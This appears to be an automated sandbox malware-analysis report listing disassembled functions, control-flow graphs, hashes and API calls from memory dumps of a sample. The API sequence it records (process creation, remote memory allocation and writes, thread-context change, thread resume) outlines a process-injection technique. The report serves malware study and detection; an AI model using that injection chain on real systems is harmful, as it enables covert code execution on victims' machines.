                                                                                                              control_flow_graph 204 21f638-21f6d1 206 21f6d3-21f6ea 204->206 207 21f71a-21f742 204->207 206->207 210 21f6ec-21f6f1 206->210 211 21f744-21f758 207->211 212 21f788-21f7de 207->212 213 21f6f3-21f6fd 210->213 214 21f714-21f717 210->214 211->212 219 21f75a-21f75f 211->219 221 21f7e0-21f7f4 212->221 222 21f824-21f91b CreateProcessA 212->222 216 21f701-21f710 213->216 217 21f6ff 213->217 214->207 216->216 220 21f712 216->220 217->216 223 21f761-21f76b 219->223 224 21f782-21f785 219->224 220->214 221->222 230 21f7f6-21f7fb 221->230 240 21f924-21fa09 222->240 241 21f91d-21f923 222->241 225 21f76d 223->225 226 21f76f-21f77e 223->226 224->212 225->226 226->226 229 21f780 226->229 229->224 232 21f7fd-21f807 230->232 233 21f81e-21f821 230->233 234 21f809 232->234 235 21f80b-21f81a 232->235 233->222 234->235 235->235 236 21f81c 235->236 236->233 253 21fa19-21fa1d 240->253 254 21fa0b-21fa0f 240->254 241->240 256 21fa2d-21fa31 253->256 257 21fa1f-21fa23 253->257 254->253 255 21fa11 254->255 255->253 259 21fa41-21fa45 256->259 260 21fa33-21fa37 256->260 257->256 258 21fa25 257->258 258->256 261 21fa47-21fa70 259->261 262 21fa7b-21fa86 259->262 260->259 263 21fa39 260->263 261->262 263->259
                                                                                                              APIs
                                                                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0021F8FF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.429444735.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_210000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 963392458-0
                                                                                                              • Opcode ID: f53ab65efa53354e77137038631b546f4f84c163e3caef00c2f88ffb92f0f15d
                                                                                                              • Instruction ID: d4804e78f1b3a2cdc5aef8f5ecdef0d51e8991787a690b87ccfba640bbfcdb2a
                                                                                                              • Opcode Fuzzy Hash: f53ab65efa53354e77137038631b546f4f84c163e3caef00c2f88ffb92f0f15d
                                                                                                              • Instruction Fuzzy Hash: BAC115B0D1022A8FDB60CFA4C941BEDBBF1BF59304F1091A9D819B7280DB749A95CF95
                                                                                                              Function 0021F2A0 Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 267 21f2a0-21f30b 269 21f322-21f389 WriteProcessMemory 267->269 270 21f30d-21f31f 267->270 272 21f392-21f3e4 269->272 273 21f38b-21f391 269->273 270->269 273->272
                                                                                                              APIs
                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0021F373
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.429444735.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_210000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 3559483778-0
                                                                                                              • Opcode ID: d772f88a709fbd5be0c8137295c5cff998e12b9cbd3e9ee44f36e77beaec6bbc
                                                                                                              • Instruction ID: bf12da2e8bb9422d7dba3c15401aa11f36f2146ba27273134058fb4c9bfbe1c9
                                                                                                              • Opcode Fuzzy Hash: d772f88a709fbd5be0c8137295c5cff998e12b9cbd3e9ee44f36e77beaec6bbc
                                                                                                              • Instruction Fuzzy Hash: A041ACB4D012589FDF00CFA9D984ADEFBF1BB49310F20902AE814B7250D375AA55CF64
                                                                                                              Function 0021F400 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 278 21f400-21f4c8 ReadProcessMemory 281 21f4d1-21f523 278->281 282 21f4ca-21f4d0 278->282 282->281
                                                                                                              APIs
                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0021F4B2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.429444735.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_210000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessRead
                                                                                                              • String ID:
                                                                                                              • API String ID: 1726664587-0
                                                                                                              • Opcode ID: c7da876e64c84f132050ebc1646539eeb96af1db4cd8bf9633f9996f4d31538f
                                                                                                              • Instruction ID: 1bb4c5c8bdb70ef0e1d509d51de8b6bf369864ff9c3be73a5e7dba59de44e9b9
                                                                                                              • Opcode Fuzzy Hash: c7da876e64c84f132050ebc1646539eeb96af1db4cd8bf9633f9996f4d31538f
                                                                                                              • Instruction Fuzzy Hash: 9341B9B9D00258DFCF00CFAAD984AEEFBB1BB49310F20942AE814B7210D735A955CF64
                                                                                                              Function 0021F178 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 287 21f178-21f238 VirtualAllocEx 290 21f241-21f28b 287->290 291 21f23a-21f240 287->291 291->290
                                                                                                              APIs
                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0021F222
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.429444735.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_210000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 4275171209-0
                                                                                                              • Opcode ID: 3ac60d9a062dcc46d75f5b9fa299b4e080dfacb82180126ea8cc9c93525e6e36
                                                                                                              • Instruction ID: 98db57044883f97be9d5ad8068f6624c339b385a54e2ae476b43330190d923ae
                                                                                                              • Opcode Fuzzy Hash: 3ac60d9a062dcc46d75f5b9fa299b4e080dfacb82180126ea8cc9c93525e6e36
                                                                                                              • Instruction Fuzzy Hash: 2241A7B8D00258DFCF10CFA9D984ADEBBB1BB49310F20942AE815BB210D775A955CFA5
                                                                                                              Function 0021EC10 Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 296 21ec10-21ec70 298 21ec72-21ec84 296->298 299 21ec87-21ecd5 Wow64SetThreadContext 296->299 298->299 301 21ecd7-21ecdd 299->301 302 21ecde-21ed2a 299->302 301->302
                                                                                                              APIs
                                                                                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 0021ECBF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.429444735.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_210000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ContextThreadWow64
                                                                                                              • String ID:
                                                                                                              • API String ID: 983334009-0
                                                                                                              • Opcode ID: 55fffe249c53f4c861dc509fb0c57be329354e61a6c952e521b0a72913e370bf
                                                                                                              • Instruction ID: 44120f0c856aab77f2dd1b339fae97990b426ad468b1a2dfd30a98547bf26e01
                                                                                                              • Opcode Fuzzy Hash: 55fffe249c53f4c861dc509fb0c57be329354e61a6c952e521b0a72913e370bf
                                                                                                              • Instruction Fuzzy Hash: 7D41ADB4D102589FDF10CFA9D984AEEBBF1BB49314F24842AE814B7240D779A985CF94
                                                                                                              Function 0021E6E8 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 307 21e6e8-21e77c ResumeThread 310 21e785-21e7c7 307->310 311 21e77e-21e784 307->311 311->310
                                                                                                              APIs
                                                                                                              • ResumeThread.KERNELBASE(?), ref: 0021E766
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.429444735.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_210000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ResumeThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 947044025-0
                                                                                                              • Opcode ID: bd9d010e5153fb3f620ba5cfb8b5b4afd5cc7da449b63f1574c675135d1ff33b
                                                                                                              • Instruction ID: e692e343d54021616971c966bd3ca4ba9236862f238c63d6f997a07f07e762a1
                                                                                                              • Opcode Fuzzy Hash: bd9d010e5153fb3f620ba5cfb8b5b4afd5cc7da449b63f1574c675135d1ff33b
                                                                                                              • Instruction Fuzzy Hash: D831D9B4D002189FDF10CFAAD984AEEFBB4AB89314F20842AE814B7340D735A941CF94
                                                                                                              Function 009D10AB Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 324 9d10ab-9d10dc call 21f2a0 325 9d10de-9d17a5 324->325 327 9d17a7-9d17a8 325->327 328 9d1763-9d1769 325->328 327->328
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.434701210.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_9d0000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (
                                                                                                              • API String ID: 0-3887548279
                                                                                                              • Opcode ID: adb8cc42ee1716c27b27c46365368abdaa289280af8ba9139d93ca7acdbd61ee
                                                                                                              • Instruction ID: 69fe31c1dadf4ef72a9ca13c6c1f6c74d4f9be29575cdc61190c8ea4d9aa3ccd
                                                                                                              • Opcode Fuzzy Hash: adb8cc42ee1716c27b27c46365368abdaa289280af8ba9139d93ca7acdbd61ee
                                                                                                              • Instruction Fuzzy Hash: 2211F33694A228DFDB20CF94CD44BE8B7B8FB49305F1495DAD409A7352C3359A81DF00
                                                                                                              Function 009D0F71 Relevance: .1, Instructions: 100COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 425 9d0f71-9d0fb2 call 21f638 427 9d0fb4-9d139b 425->427 429 9d15ef-9d1635 call 9d0e08 427->429 430 9d13a1-9d15e4 427->430 436 9d0fdf-9d0fe8 429->436 437 9d163b-9d163c 429->437 430->429 438 9d0fea 436->438 439 9d0ff1-9d0ff2 436->439 438->439 440 9d131a-9d1324 438->440 441 9d11c1-9d1907 438->441 442 9d12f3-9d17d6 438->442 439->442 443 9d132b-9d1333 440->443 444 9d1326 440->444 442->436 444->443
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.434701210.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_9d0000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4d3a89aa68f3d08679286be2a3e8080155ab76b5aa0da8e7aa5646de1507e0fa
                                                                                                              • Instruction ID: 57eb7e3f430ba658b2dab2d2e33891dce8e24c8921763df06d43d63d97c4df23
                                                                                                              • Opcode Fuzzy Hash: 4d3a89aa68f3d08679286be2a3e8080155ab76b5aa0da8e7aa5646de1507e0fa
                                                                                                              • Instruction Fuzzy Hash: FE41E475948228DFDB60CF64C885BE9B7B5AF89300F20C0DAE549A7351DB745AC4DF40
                                                                                                              Function 0013D3D8 Relevance: .1, Instructions: 75COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.428840176.000000000013D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0013D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_13d000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a997cf3ca6b21f19f4d1767d2cb03ef91357e0f8dca6bfecfdc49d7380b6595d
                                                                                                              • Instruction ID: ef98d5a3836641b09814d61771c85807fdb54e7a88f28cda26d3863782cd67a2
                                                                                                              • Opcode Fuzzy Hash: a997cf3ca6b21f19f4d1767d2cb03ef91357e0f8dca6bfecfdc49d7380b6595d
                                                                                                              • Instruction Fuzzy Hash: B421D3B5604340DFEB05DF14F9C4B16BF65FB98324F24C669E8094B646C336E856CBA2
                                                                                                              Function 0014D01C Relevance: .1, Instructions: 72COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.428856535.000000000014D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0014D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_14d000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2bfca674cb4960ad5de00d5a64873e01a6d40ab3ed3d3266d889883974e5c839
                                                                                                              • Instruction ID: d2a27c864a10b30cc54ea9d431fd38a2289cc4a43a5815693f26e103e2c5f597
                                                                                                              • Opcode Fuzzy Hash: 2bfca674cb4960ad5de00d5a64873e01a6d40ab3ed3d3266d889883974e5c839
                                                                                                              • Instruction Fuzzy Hash: E521C275604340DFEF14DF14E8C4B16BB65EB84714F34C6A9E8494B266C33AD847CBA2
                                                                                                              Function 009D1030 Relevance: .1, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.434701210.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_9d0000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 299b420a98ed2d3b879ae80e4a8ed5e2e545f96519daab162a944e6dd5b1bb5d
                                                                                                              • Instruction ID: 4be9089a2f6dbbb60cd2ee11915538c4f23c8d7fed5f2d035100b7e5cae8ecb5
                                                                                                              • Opcode Fuzzy Hash: 299b420a98ed2d3b879ae80e4a8ed5e2e545f96519daab162a944e6dd5b1bb5d
                                                                                                              • Instruction Fuzzy Hash: 5131E239D08218DFCB14CF64C980BEDB7B9AF49301F14859A940EA7356D7359A85DF00
                                                                                                              Function 0014D006 Relevance: .1, Instructions: 63COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.428856535.000000000014D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0014D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_14d000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0b9523b9d56ccbb8621a21ab06f7f0522539329c8853b02a0cc20296bd4b348b
                                                                                                              • Instruction ID: 3308f28ec2963dbf8f98f9aef94de78f7cd470689fa349770223e467fcc16e98
                                                                                                              • Opcode Fuzzy Hash: 0b9523b9d56ccbb8621a21ab06f7f0522539329c8853b02a0cc20296bd4b348b
                                                                                                              • Instruction Fuzzy Hash: 4E2150755083809FDB02CF14D994715BF71EB46314F29C5DAD8498F267C33AD85ACBA2
                                                                                                              Function 009D0320 Relevance: .1, Instructions: 60COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.434701210.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_9d0000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d2bfb1d0304d01de473a102e8e6af42917b275fd5a94699e58fa2ed2c5ec3f42
                                                                                                              • Instruction ID: e2b2018327ca7253e6d1faf0f3bea5730ac1e7473e8de23f804786f525c35a8c
                                                                                                              • Opcode Fuzzy Hash: d2bfb1d0304d01de473a102e8e6af42917b275fd5a94699e58fa2ed2c5ec3f42
                                                                                                              • Instruction Fuzzy Hash: 85215C74E093459FCB01DFB4D9586BEBBB1EF8B301F20959AD405A73A1D7304941DBA1
                                                                                                              Function 009D1041 Relevance: .1, Instructions: 60COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.434701210.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_9d0000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: beed916620d68db5c263735224060d03891fde5fcd1eb4d069aba2594f788528
                                                                                                              • Instruction ID: 1836f2b322f7e61be245a4d344c651d286f33517a83e2c59f1e1fa708cc5259b
                                                                                                              • Opcode Fuzzy Hash: beed916620d68db5c263735224060d03891fde5fcd1eb4d069aba2594f788528
                                                                                                              • Instruction Fuzzy Hash: 7A212939945218DFCB64CF90C884BE8B7B5AB49354F24D4DA8409A33A5D7359FC6CF50
                                                                                                              Function 009D00C0 Relevance: .1, Instructions: 59COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.434701210.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_9d0000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 979cfd9146f8b5856490acb7577b299b171ed2a6e666da2f86e66d2cb47fafd0
                                                                                                              • Instruction ID: 70a5ead9b82509aed646aa871f9d4b060c46b3fbab943dde7163c28dfeb953ce
                                                                                                              • Opcode Fuzzy Hash: 979cfd9146f8b5856490acb7577b299b171ed2a6e666da2f86e66d2cb47fafd0
                                                                                                              • Instruction Fuzzy Hash: 41114674E58218ABDB00DBA8D5183FEBBF9FB8A301F10846AC405A3390D7784A44DBA0
                                                                                                              Function 0013D3D3 Relevance: .1, Instructions: 56COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.428840176.000000000013D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0013D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_13d000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9db876a194b11add3b8ed59ab83e46afef4b80a3836825e6e29e07944ab82751
                                                                                                              • Instruction ID: df4e59ac3bdb1c882b07d43916c7db0e50de15d8fca23907882e26c56f2ea694
                                                                                                              • Opcode Fuzzy Hash: 9db876a194b11add3b8ed59ab83e46afef4b80a3836825e6e29e07944ab82751
                                                                                                              • Instruction Fuzzy Hash: 4511D376504240DFDB12CF14E9C4B16BF71FB94324F24C6A9D8494B616C33AE85ACBA2
                                                                                                              Function 009D0618 Relevance: .1, Instructions: 51COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.434701210.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_9d0000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 31396c635252e1154032c8adf5c3596491461fec4d785d9aef895df09433f8f6
                                                                                                              • Instruction ID: 262edee66e608f6475d6929b3e7dd0e082b85917fe93371932589d041a110403
                                                                                                              • Opcode Fuzzy Hash: 31396c635252e1154032c8adf5c3596491461fec4d785d9aef895df09433f8f6
                                                                                                              • Instruction Fuzzy Hash: EF115AB4D09309DFCB40DFA5C5556AEBBB5EF8A300F20D1AAC804A7351E7348A42DF90
                                                                                                              Function 009D0171 Relevance: .0, Instructions: 47COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.434701210.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_9d0000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 613514022be3647fa5ae5c9141b21ef229f71c61c47dbbf2e25b69349cd4b16f
                                                                                                              • Instruction ID: d51ff9fd0a6189d17ca2ec74e7d764e2c93351ad873d55ad1e56d262acf828b1
                                                                                                              • Opcode Fuzzy Hash: 613514022be3647fa5ae5c9141b21ef229f71c61c47dbbf2e25b69349cd4b16f
                                                                                                              • Instruction Fuzzy Hash: C0114874D4D249EFCB01CFA999542ADBFB4AF8A300F14959AD415A7362D6344A40DB90
                                                                                                              Function 009D0628 Relevance: .0, Instructions: 45COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.434701210.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_9d0000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fcacb86f8108e79dbf6b07b870af92739b40d0b0c7fbf53b682b2d76ff791478
                                                                                                              • Instruction ID: 61bf7b32c7cfddb2dcbde49f892282b08580c073b58b25aea210cac4bc87bb0d
                                                                                                              • Opcode Fuzzy Hash: fcacb86f8108e79dbf6b07b870af92739b40d0b0c7fbf53b682b2d76ff791478
                                                                                                              • Instruction Fuzzy Hash: 8811A2B4E08209DFCB44DFA9D5556AEBBF5FF8A300F60916A8819A3310E7349A51DF90
                                                                                                              Function 009D00B0 Relevance: .0, Instructions: 44COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.434701210.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_9d0000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 74e688bb5b1b393f0ba71e11de6283fb4ac372a6fcd314623bab24cd77d182fa
                                                                                                              • Instruction ID: 4cbaddcec6e1b96ecb358677fcc428ae0d940c65e346c62b386ecabd9fbc25d6
                                                                                                              • Opcode Fuzzy Hash: 74e688bb5b1b393f0ba71e11de6283fb4ac372a6fcd314623bab24cd77d182fa
                                                                                                              • Instruction Fuzzy Hash: 5C01867599E254DFCB118BA5D5183FD7BB4AB86301F0488ABC051A23A1C7780659DB51
                                                                                                              Function 009D1054 Relevance: .0, Instructions: 43COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.434701210.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_9d0000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cd9512c0bb03886ac754bf29f6e3bf5a6a1e0a3834129bfdcf19e3133598484f
                                                                                                              • Instruction ID: c9fc5e926a4b32213dfb2ceacff9fdfe12a22c319ac6b27247ff0e0892a2ee5e
                                                                                                              • Opcode Fuzzy Hash: cd9512c0bb03886ac754bf29f6e3bf5a6a1e0a3834129bfdcf19e3133598484f
                                                                                                              • Instruction Fuzzy Hash: 9D11D075948218DFCB64CF54D880BECB7B8AB4A300F20949AE50EA7392D7359E85DF40
                                                                                                              Function 009D0AE1 Relevance: .0, Instructions: 30COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.434701210.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_9d0000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d23336fca9d91d41d2fb7c1982f418bdc4db2e5a1c1d4985baef3655e288df1b
                                                                                                              • Instruction ID: b6a8d350025af804995c5a70f54a83a51169ea37aa9cb7abb7302569d843b147
                                                                                                              • Opcode Fuzzy Hash: d23336fca9d91d41d2fb7c1982f418bdc4db2e5a1c1d4985baef3655e288df1b
                                                                                                              • Instruction Fuzzy Hash: 18F03A70D4D3489FCB45DFB4D959A5CBFB4AF8B301F1095EAD408A33A1D6340A51DB81
                                                                                                              Function 009D172D Relevance: .0, Instructions: 25COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.434701210.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_9d0000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 486040abaff1d099e9f6f9a450bdb518da55a3f5c200af22890f928d3666c66a
                                                                                                              • Instruction ID: 67932b09e97652bcea752461b4ea7672924be697e0778b2e45a67fa41a5bf525
                                                                                                              • Opcode Fuzzy Hash: 486040abaff1d099e9f6f9a450bdb518da55a3f5c200af22890f928d3666c66a
                                                                                                              • Instruction Fuzzy Hash: 0EF01236904228DFCB64CF90CD50BECBBB9AF49300F2080DAD50DA62A1C7369B82DF50
                                                                                                              Function 009D0AF0 Relevance: .0, Instructions: 25COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.434701210.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_9d0000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cd6e5abc27b9d2b60f13992411353699577739c80c003e2efed842465aa43d2e
                                                                                                              • Instruction ID: 07fefe1c93159b38c532243298e6da9bcd40eed13e24808c7b646af029c39038
                                                                                                              • Opcode Fuzzy Hash: cd6e5abc27b9d2b60f13992411353699577739c80c003e2efed842465aa43d2e
                                                                                                              • Instruction Fuzzy Hash: 93E06D70E09308DFCB44DFA4E9596ADBBB8EF8A301F20D5AAD408A3350DB345A40DF80
                                                                                                              Function 009D0288 Relevance: .0, Instructions: 24COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000A.00000002.434701210.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_10_2_9d0000_millitingacy20306.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3b3580ed088b25532937a6c481f4c030270b58cb4a567cade58ef85303f621cc
                                                                                                              • Instruction ID: c4f91a0e6243e30af65264f2c60e7adfcf2cfed952679707d55ce5e209426e70
                                                                                                              • Opcode Fuzzy Hash: 3b3580ed088b25532937a6c481f4c030270b58cb4a567cade58ef85303f621cc
                                                                                                              • Instruction Fuzzy Hash: EDF0A93880A3989FC702CBE49A6826C7FB0AF47300F1481CBC454A73A2C6348E46EB81
